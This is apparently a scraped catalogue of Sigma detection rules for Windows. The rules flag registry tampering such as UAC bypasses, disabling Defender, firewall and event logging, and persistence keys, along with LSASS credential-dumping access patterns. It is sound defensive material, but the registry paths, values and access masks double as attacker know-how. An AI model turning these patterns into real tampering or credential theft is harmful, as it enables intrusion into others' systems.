Detection logic
condition: selection
selection:
Details|contains|all:
- powershell
- -command
TargetObject|contains: shell\open\command\
Potential AutoLogger Sessions Tampering
- source: sigma
- technicques:
Description
Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging
Detection logic
condition: all of selection_* and not 1 of filter_*
filter_wevtutil:
Image: C:\Windows\system32\wevtutil.exe
selection_main:
TargetObject|contains: \System\CurrentControlSet\Control\WMI\Autologger\
selection_values:
Details: DWORD (0x00000000)
TargetObject|contains:
- \EventLog-
- \Defender
TargetObject|endswith:
- \Enable
- \Start
UAC Bypass via Event Viewer
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects UAC bypass method using Windows event viewer
Detection logic
condition: selection
selection:
TargetObject|endswith: \mscfile\shell\open\command
Disable PUA Protection on Windows Defender
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects disabling Windows Defender PUA protection
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|contains: \Policies\Microsoft\Windows Defender\PUAProtection
PowerShell as a Service in Registry
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects that a powershell code is written to the registry as a service.
Detection logic
condition: selection
selection:
Details|contains:
- powershell
- pwsh
TargetObject|contains: \Services\
TargetObject|endswith: \ImagePath
Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
- source: sigma
- technicques:
- t1112
Description
Detects an attacker trying to enable the outlook security setting “EnableUnsafeClientMailRules” which allows outlook to run applications or execute macros
Detection logic
condition: selection
selection:
Details: DWORD (0x00000001)
TargetObject|endswith: \Outlook\Security\EnableUnsafeClientMailRules
Suspicious Path In Keyboard Layout IME File Registry Value
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named “Ime File” with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
Detection logic
condition: selection_registry and 1 of selection_folders_*
selection_folders_1:
Details|contains:
- :\Perflogs\
- :\Users\Public\
- :\Windows\Temp\
- \AppData\Local\Temp\
- \AppData\Roaming\
- \Temporary Internet
selection_folders_2:
- Details|contains|all:
- :\Users\
- \Favorites\
- Details|contains|all:
- :\Users\
- \Favourites\
- Details|contains|all:
- :\Users\
- \Contacts\
selection_registry:
TargetObject|contains|all:
- \Control\Keyboard Layouts\
- Ime File
Scheduled TaskCache Change by Uncommon Program
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Monitor the creation of a new key under ‘TaskCache’ when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
Detection logic
condition: selection and not 1 of filter*
filter:
TargetObject|contains:
- Microsoft\Windows\UpdateOrchestrator
- Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask\Index
- Microsoft\Windows\Flighting\OneSettings\RefreshCache\Index
filter_dropbox_updater:
Image:
- C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
- C:\Program Files\Dropbox\Update\DropboxUpdate.exe
filter_explorer:
Image: C:\Windows\explorer.exe
TargetObject|contains: \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server
Manager Performance Monitor\
filter_msiexec:
Image: C:\Windows\System32\msiexec.exe
filter_ngen:
Image|endswith: \ngen.exe
Image|startswith: C:\Windows\Microsoft.NET\Framework
TargetObject|contains:
- \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}
- \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET
Framework\.NET Framework NGEN
filter_office_click_to_run:
Image:
- C:\Program Files\Microsoft Office\root\Integration\Integrator.exe
- C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
filter_svchost:
Image: C:\WINDOWS\system32\svchost.exe
filter_system:
Image: System
filter_tiworker:
Image|endswith: \TiWorker.exe
Image|startswith: C:\Windows\
selection:
TargetObject|contains: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\
COM Hijack via Sdclt
- source: sigma
- technicques:
- t1546
- t1548
Description
Detects changes to ‘HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute’
Detection logic
condition: selection
selection:
TargetObject|contains: \Software\Classes\Folder\shell\open\command\DelegateExecute
Potential Persistence Via Shim Database In Uncommon Location
- source: sigma
- technicques:
- t1546
- t1546.011
Description
Detects the installation of a new shim database where the file is located in a non-default location
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_known_locations:
Details|contains: :\Windows\AppPatch\Custom
selection:
TargetObject|contains|all:
- \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\
- \DatabasePath
UAC Disabled
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value “EnableLUA” to 0.
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|contains: \Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
UAC Bypass via Sdclt
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
Detection logic
condition: 1 of selection*
selection1:
TargetObject|endswith: Software\Classes\exefile\shell\runas\command\isolatedCommand
selection2:
Details|re: -1[0-9]{3}\\Software\\Classes\\
TargetObject|endswith: Software\Classes\Folder\shell\open\command\SymbolicLinkValue
Blackbyte Ransomware Registry
- source: sigma
- technicques:
- t1112
Description
BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
Detection logic
condition: selection
selection:
Details: DWORD (0x00000001)
TargetObject:
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections
- HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\LongPathsEnabled
Enable LM Hash Storage
- source: sigma
- technicques:
- t1112
Description
Detects changes to the “NoLMHash” registry value in order to allow Windows to store LM Hashes. By setting this registry value to “0” (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|endswith: System\CurrentControlSet\Control\Lsa\NoLMHash
Potential Persistence Via Event Viewer Events.asp
- source: sigma
- technicques:
- t1112
Description
Detects potential registry persistence technique using the Event Viewer “Events.asp” technique
Detection logic
condition: selection and not 1 of filter_*
filter_cleaner:
Details: (Empty)
filter_default_redirect_program:
Details: '%%SystemRoot%%\PCHealth\HelpCtr\Binaries\HelpCtr.exe'
Image|endswith: C:\WINDOWS\system32\svchost.exe
TargetObject|endswith: \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram
filter_default_redirect_program_cli:
Details: -url hcp://services/centers/support?topic=%%s
Image|endswith: C:\WINDOWS\system32\svchost.exe
TargetObject|endswith: \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgramCommandLineParameters
filter_url:
Details: http://go.microsoft.com/fwlink/events.asp
selection:
TargetObject|contains:
- \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram
- \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionURL
Bypass UAC Using DelegateExecute
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Bypasses User Account Control using a fileless method
Detection logic
condition: selection
selection:
Details: (Empty)
TargetObject|endswith: \open\command\DelegateExecute
RestrictedAdminMode Registry Value Tampering
- source: sigma
- technicques:
- t1112
Description
Detects changes to the “DisableRestrictedAdmin” registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
Detection logic
condition: selection
selection:
TargetObject|endswith: System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin
Potential PowerShell Execution Policy Tampering
- source: sigma
- technicques:
Description
Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_svchost:
Image|contains:
- :\Windows\System32\
- :\Windows\SysWOW64\
selection:
Details|contains:
- Bypass
- Unrestricted
TargetObject|endswith:
- \ShellIds\Microsoft.PowerShell\ExecutionPolicy
- \Policies\Microsoft\Windows\PowerShell\ExecutionPolicy
Potential PSFactoryBuffer COM Hijacking
- source: sigma
- technicques:
- t1546
- t1546.015
Description
Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
Detection logic
condition: selection and not filter_main
filter_main:
Details:
- '%windir%\System32\ActXPrxy.dll'
- C:\Windows\System32\ActXPrxy.dll
selection:
TargetObject|endswith: \CLSID\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\InProcServer32\(Default)
Wdigest Enable UseLogonCredential
- source: sigma
- technicques:
- t1112
Description
Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
Detection logic
condition: selection
selection:
Details: DWORD (0x00000001)
TargetObject|endswith: WDigest\UseLogonCredential
Bypass UAC Using Event Viewer
- source: sigma
- technicques:
- t1547
- t1547.010
Description
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
Detection logic
condition: selection and not filter
filter:
Details|startswith: '%SystemRoot%\system32\mmc.exe "%1" %'
selection:
TargetObject|endswith: _Classes\mscfile\shell\open\command\(Default)
Execution DLL of Choice Using WAB.EXE
- source: sigma
- technicques:
- t1218
Description
This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
Detection logic
condition: selection and not filter
filter:
Details: '%CommonProgramFiles%\System\wab32.dll'
selection:
TargetObject|endswith: \Software\Microsoft\WAB\DLLPath
Disable Windows Security Center Notifications
- source: sigma
- technicques:
- t1112
Description
Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|endswith: Windows\CurrentVersion\ImmersiveShell\UseActionCenterExperience
Lolbas OneDriveStandaloneUpdater.exe Proxy Download
- source: sigma
- technicques:
- t1105
Description
Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
Detection logic
condition: selection
selection:
TargetObject|contains: \SOFTWARE\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC
Potential Registry Persistence Attempt Via Windows Telemetry
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_generic:
Details|contains:
- \system32\CompatTelRunner.exe
- \system32\DeviceCensus.exe
selection:
Details|contains:
- .bat
- .bin
- .cmd
- .dat
- .dll
- .exe
- .hta
- .jar
- .js
- .msi
- .ps
- .sh
- .vb
TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\
TargetObject|endswith: \Command
Change Winevt Channel Access Permission Via Registry
- source: sigma
- technicques:
- t1562
- t1562.002
Description
Detects tampering with the “ChannelAccess” registry key in order to change access to Windows event channel.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_tiworker:
Image|endswith: \TiWorker.exe
Image|startswith: C:\Windows\WinSxS\
filter_main_trustedinstaller:
Image: C:\Windows\servicing\TrustedInstaller.exe
selection:
Details|contains:
- (A;;0x1;;;LA)
- (A;;0x1;;;SY)
- (A;;0x5;;;BA)
TargetObject|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\
TargetObject|endswith: \ChannelAccess
Potential EventLog File Location Tampering
- source: sigma
- technicques:
- t1562
- t1562.002
Description
Detects tampering with EventLog service “file” key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
Detection logic
condition: selection and not filter
filter:
Details|contains: \System32\Winevt\Logs\
selection:
TargetObject|contains: \SYSTEM\CurrentControlSet\Services\EventLog\
TargetObject|endswith: \File
New File Association Using Exefile
- source: sigma
- technicques:
Description
Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
Detection logic
condition: selection
selection:
Details: exefile
TargetObject|contains: Classes\.
Potential AMSI COM Server Hijacking
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
Detection logic
condition: selection and not filter
filter:
Details: '%windir%\system32\amsi.dll'
selection:
TargetObject|endswith: \CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\(Default)
Potential Persistence Via GlobalFlags
- source: sigma
- technicques:
- t1546
- t1546.012
Description
Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
Detection logic
condition: 1 of selection_*
selection_global_flag:
TargetObject|contains|all:
- \Microsoft\Windows NT\CurrentVersion\
- \Image File Execution Options\
- \GlobalFlag
selection_silent_process:
TargetObject|contains:
- \ReportingMode
- \MonitorProcess
TargetObject|contains|all:
- \Microsoft\Windows NT\CurrentVersion\
- \SilentProcessExit\
Registry Disable System Restore
- source: sigma
- technicques:
- t1490
Description
Detects the modification of the registry to disable a system restore on the computer
Detection logic
condition: selection
selection:
Details: DWORD (0x00000001)
TargetObject|contains:
- \Policies\Microsoft\Windows NT\SystemRestore
- \Microsoft\Windows NT\CurrentVersion\SystemRestore
TargetObject|endswith:
- DisableConfig
- DisableSR
Registry Persistence via Service in Safe Mode
- source: sigma
- technicques:
- t1564
- t1564.001
Description
Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
Detection logic
condition: selection and not 1 of filter_optional_*
filter_optional_sophos:
Image: C:\WINDOWS\system32\msiexec.exe
TargetObject|endswith:
- \Control\SafeBoot\Minimal\SAVService\(Default)
- \Control\SafeBoot\Network\SAVService\(Default)
selection:
Details: Service
TargetObject|contains:
- \Control\SafeBoot\Minimal\
- \Control\SafeBoot\Network\
TargetObject|endswith: \(Default)
Potential Persistence Via DLLPathOverride
- source: sigma
- technicques:
Description
Detects when an attacker adds a new “DLLPathOverride” value to the “Natural Language” key in order to achieve persistence which will get invoked by “SearchIndexer.exe” process
Detection logic
condition: all of selection_*
selection_root:
TargetObject|contains: \SYSTEM\CurrentControlSet\Control\ContentIndex\Language\
selection_values:
TargetObject|contains:
- \StemmerDLLPathOverride
- \WBDLLPathOverride
- \StemmerClass
- \WBreakerClass
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
- source: sigma
- technicques:
Description
Detects changes to Internet Explorer’s (IE / Windows Internet properties) ZoneMap configuration of the “HTTP” and “HTTPS” protocols to point to the “My Computer” zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
Detection logic
condition: selection
selection:
Details|contains: DWORD (0x00000000)
TargetObject|contains: \Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults
TargetObject|endswith:
- \http
- \https
MaxMpxCt Registry Value Changed
- source: sigma
- technicques:
- t1070
- t1070.005
Description
Detects changes to the “MaxMpxCt” registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
Detection logic
condition: selection
selection:
TargetObject|endswith: \Services\LanmanServer\Parameters\MaxMpxCt
Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
- source: sigma
- technicques:
- t1008
- t1137
- t1546
Description
Detects the modification of Outlook setting “LoadMacroProviderOnBoot” which if enabled allows the automatic loading of any configured VBA project/module
Detection logic
condition: selection
selection:
Details|contains: '0x00000001'
TargetObject|endswith: \Outlook\LoadMacroProviderOnBoot
NET NGenAssemblyUsageLog Registry Key Tamper
- source: sigma
- technicques:
- t1112
Description
Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
Detection logic
condition: selection
selection:
TargetObject|endswith: SOFTWARE\Microsoft\.NETFramework\NGenAssemblyUsageLog
Hypervisor Enforced Code Integrity Disabled
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the “Enabled” value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
EventType: SetValue
TargetObject|endswith:
- \Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity
- \Control\DeviceGuard\HypervisorEnforcedCodeIntegrity
- \Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity\Enabled
New Root or CA or AuthRoot Certificate to Store
- source: sigma
- technicques:
- t1490
Description
Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
Detection logic
condition: selection
selection:
Details: Binary Data
TargetObject|contains:
- \SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\
- \SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates\
- \SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\
- \SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\
- \SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates\
- \SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates\
- \SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\
- \SOFTWARE\Policies\Microsoft\SystemCertificates\AuthRoot\Certificates\
- \SOFTWARE\Microsoft\EnterpriseCertificates\AuthRoot\Certificates\
TargetObject|endswith: \Blob
Winlogon Notify Key Logon Persistence
- source: sigma
- technicques:
- t1547
- t1547.004
Description
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Detection logic
condition: selection
selection:
Details|endswith: .dll
TargetObject|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\logon
Suspicious Shim Database Patching Activity
- source: sigma
- technicques:
- t1546
- t1546.011
Description
Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
Detection logic
condition: selection
selection:
TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\
TargetObject|endswith:
- \csrss.exe
- \dllhost.exe
- \explorer.exe
- \RuntimeBroker.exe
- \services.exe
- \sihost.exe
- \svchost.exe
- \taskhostw.exe
- \winlogon.exe
- \WmiPrvSe.exe
Potential Persistence Via Outlook Home Page
- source: sigma
- technicques:
- t1112
Description
Detects potential persistence activity via outlook home pages.
Detection logic
condition: all of selection_*
selection_1:
TargetObject|contains:
- \Software\Microsoft\Office\
- \Outlook\WebView\
TargetObject|endswith: \URL
selection_2:
TargetObject|contains:
- \Calendar\
- \Inbox\
Disable Tamper Protection on Windows Defender
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects disabling Windows Defender Tamper Protection
Detection logic
condition: selection and not 1 of filter_*
filter_msmpeng_client:
Image|endswith: \MsMpEng.exe
Image|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\
filter_msmpeng_domain_controller:
Image: C:\Program Files\Windows Defender\MsMpEng.exe
selection:
Details: DWORD (0x00000000)
TargetObject|contains: \Microsoft\Windows Defender\Features\TamperProtection
Activate Suppression of Windows Security Center Notifications
- source: sigma
- technicques:
- t1112
Description
Detect set Notification_Suppress to 1 to disable the Windows security center notification
Detection logic
condition: selection
selection:
Details: DWORD (0x00000001)
TargetObject|endswith: SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration\Notification_Suppress
Disable Exploit Guard Network Protection on Windows Defender
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects disabling Windows Defender Exploit Guard Network Protection
Detection logic
condition: selection
selection:
Details: DWORD (00000001)
TargetObject|contains: SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App
and Browser protection\DisallowExploitProtectionOverride
Modification of IE Registry Settings
- source: sigma
- technicques:
- t1112
Description
Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence
Detection logic
condition: selection_domains and not 1 of filter_*
filter_accepted_documents:
TargetObject|contains: \Accepted Documents\
filter_binary:
Details: Binary Data
filter_dword:
Details|startswith: DWORD
filter_office:
Details:
- 'Cookie:'
- 'Visited:'
- (Empty)
filter_path:
TargetObject|contains:
- \Cache
- \ZoneMap
- \WpadDecision
selection_domains:
TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\Internet Settings
Displaying Hidden Files Feature Disabled
- source: sigma
- technicques:
- t1564
- t1564.001
Description
Detects modifications to the “Hidden” and “ShowSuperHidden” explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|endswith:
- \Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
- \Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
New DNS ServerLevelPluginDll Installed
- source: sigma
- technicques:
- t1112
- t1574
- t1574.002
Description
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
Detection logic
condition: selection
selection:
TargetObject|endswith: \services\DNS\Parameters\ServerLevelPluginDll
UAC Bypass Using Windows Media Player - Registry
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Detection logic
condition: selection
selection:
Details: Binary Data
TargetObject|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility
Assistant\Store\C:\Program Files\Windows Media Player\osk.exe
Disable Administrative Share Creation at Startup
- source: sigma
- technicques:
- t1070
- t1070.005
Description
Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|contains: \Services\LanmanServer\Parameters\
TargetObject|endswith:
- \AutoShareWks
- \AutoShareServer
Change User Account Associated with the FAX Service
- source: sigma
- technicques:
- t1112
Description
Detect change of the user account associated with the FAX service to avoid the escalation problem.
Detection logic
condition: selection and not filter
filter:
Details|contains: NetworkService
selection:
TargetObject: HKLM\System\CurrentControlSet\Services\Fax\ObjectName
Service Binary in Suspicious Folder
- source: sigma
- technicques:
- t1112
Description
Detect the creation of a service with a service binary located in a suspicious directory
Detection logic
condition: 1 of selection_* and not 1 of filter_*
filter_1:
Image|contains|all:
- \Common Files\
- \Temp\
selection_1:
Details:
- DWORD (0x00000000)
- DWORD (0x00000001)
- DWORD (0x00000002)
Image|contains:
- \Users\Public\
- \Perflogs\
- \ADMIN$\
- \Temp\
TargetObject|endswith: \Start
TargetObject|startswith: HKLM\System\CurrentControlSet\Services\
selection_2:
Details|contains:
- \Users\Public\
- \Perflogs\
- \ADMIN$\
- \Temp\
TargetObject|endswith: \ImagePath
TargetObject|startswith: HKLM\System\CurrentControlSet\Services\
Disable Microsoft Defender Firewall via Registry
- source: sigma
- technicques:
- t1562
- t1562.004
Description
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|contains: \Services\SharedAccess\Parameters\FirewallPolicy\
TargetObject|endswith: \EnableFirewall
Function Call From Undocumented COM Interface EditionUpgradeManager
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.
Detection logic
condition: selection
selection:
CallTrace|contains: editionupgrademanagerobj.dll
Potential Credential Dumping Activity Via LSASS
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_system_user:
SourceUser|contains:
- AUTHORI
- AUTORI
filter_optional_sysmon:
SourceImage|endswith: :\Windows\Sysmon64.exe
filter_optional_thor:
CallTrace|contains|all:
- :\Windows\Temp\asgard2-agent\
- \thor\thor64.exe+
- '|UNKNOWN('
GrantedAccess: '0x103800'
selection:
CallTrace|contains:
- dbgcore.dll
- dbghelp.dll
- kernel32.dll
- kernelbase.dll
- ntdll.dll
GrantedAccess|contains:
- '0x1038'
- '0x1438'
- '0x143a'
- '0x1fffff'
TargetImage|endswith: \lsass.exe
Potential Shellcode Injection
- source: sigma
- technicques:
- t1055
Description
Detects potential shellcode injection used by tools such as Metasploit’s migrate and Empire’s psinject
Detection logic
condition: selection and not 1 of filter_optional_*
filter_optional_ddvdatacollector:
SourceImage|contains: :\Program Files\Microsoft Visual Studio\
SourceImage|endswith: \MSBuild\Current\Bin\MSBuild.exe
TargetImage|endswith: :\Program Files\Dell\DellDataVault\DDVDataCollector.exe
filter_optional_dell_folders:
CallTrace|startswith: ?:\Windows\System32\ntdll.dll
GrantedAccess: '0x1F3FFF'
SourceImage|contains:
- :\Program Files\Dell\
- :\Program Files (x86)\Dell\
TargetImage|contains:
- :\Program Files\Dell\
- :\Program Files (x86)\Dell\
filter_optional_dell_specifc:
CallTrace|startswith: ?:\Windows\System32\ntdll.dll
GrantedAccess: '0x1F3FFF'
SourceImage|endswith: :\Program Files (x86)\Dell\UpdateService\ServiceShell.exe
TargetImage|endswith: :\Windows\Explorer.EXE
filter_optional_visual_studio:
CallTrace|startswith: ?:\Windows\System32\ntdll.dll
SourceImage|endswith:
- :\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\PerfWatson2.exe
- :\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\PerfWatson2.exe
TargetImage|endswith:
- :\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe
- :\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe
filter_optional_wmiprvese:
CallTrace|startswith: ?:\Windows\SYSTEM32\ntdll.dll
SourceImage|endswith: :\Windows\System32\Wbem\Wmiprvse.exe
TargetImage|endswith: :\Windows\system32\lsass.exe
selection:
CallTrace|contains: UNKNOWN
GrantedAccess:
- '0x147a'
- '0x1f3fff'
Credential Dumping Attempt Via Svchost
- source: sigma
- technicques:
- t1548
Description
Detects when a process tries to access the memory of svchost to potentially dump credentials.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_known_processes:
SourceImage|endswith:
- \services.exe
- \msiexec.exe
selection:
GrantedAccess: '0x143a'
TargetImage|endswith: \svchost.exe
HackTool - SysmonEnte Execution
- source: sigma
- technicques:
- t1562
- t1562.002
Description
Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon
Detection logic
condition: ( selection_sysmon and not 1 of filter_main_* ) or selection_calltrace
filter_main_generic:
SourceImage|contains:
- :\Program Files (x86)\
- :\Program Files\
- :\Windows\System32\
- :\Windows\SysWOW64\
filter_main_msdefender:
SourceImage|contains: :\ProgramData\Microsoft\Windows Defender\Platform\
SourceImage|endswith: \MsMpEng.exe
selection_calltrace:
CallTrace: Ente
selection_sysmon:
GrantedAccess: '0x1400'
TargetImage|contains:
- :\Windows\Sysmon.exe
- :\Windows\Sysmon64.exe
Lsass Memory Dump via Comsvcs DLL
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
Detection logic
condition: selection
selection:
CallTrace|contains: comsvcs.dll
SourceImage|endswith: \rundll32.exe
TargetImage|endswith: \lsass.exe
HackTool - HandleKatz Duplicating LSASS Handle
- source: sigma
- technicques:
- t1003
- t1003.001
- t1106
Description
Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
Detection logic
condition: selection
selection:
CallTrace|contains: '|UNKNOWN('
CallTrace|endswith: )
CallTrace|startswith: C:\Windows\System32\ntdll.dll+
GrantedAccess: '0x1440'
TargetImage|endswith: \lsass.exe
Potential NT API Stub Patching
- source: sigma
- technicques:
- t1562
- t1562.002
Description
Detects potential NT API stub patching as seen used by the project PatchingAPI
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_dotnet:
SourceImage|contains: :\Windows\Microsoft.NET\
TargetImage|contains: :\Windows\Microsoft.NET\
filter_main_generic:
- SourceImage|contains:
- :\Program Files\
- :\Program Files (x86)\
- :\Windows\System32\
- :\Windows\SysWOW64\
- TargetImage|contains:
- :\Program Files\
- :\Program Files (x86)\
- :\Windows\System32\
- :\Windows\SysWOW64\
filter_main_taskhost:
SourceImage|contains:
- :\Windows\system32\taskhostw.exe
- :\Windows\system32\taskhost.exe
TargetImage|contains:
- :\Windows\Microsoft.NET\Framework\v
- :\Windows\Microsoft.NET\Framework64\v
